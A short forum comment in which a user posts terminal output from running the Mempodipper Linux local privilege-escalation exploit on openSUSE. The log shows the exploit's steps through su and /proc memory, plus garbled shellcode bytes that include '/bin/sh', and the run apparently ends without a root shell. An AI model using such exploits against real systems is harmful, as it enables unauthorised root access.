( LGee | 2012. 01. 23., h – 13:27 )

openSUSE 3.1.0-1.2-desktop x86_64


$ ./mempodipper.bin
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6936/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x25e0.
[+] Calculating su padding.
[+] Seeking to offset 0x25d7.
[+] Executing su with shellcode.
su: user H1ÿ°iH1ÿ°j@·@¶°!H»//bin/shHÁSH‰çH1Ûf»-iSH‰áH1ÀPQWH‰æH1Ò°; does not exist
^[[?1;2c^[[?1;2c^[[?1;2c^[[?1;2c$ 1;2c1;2c1;2c1;2c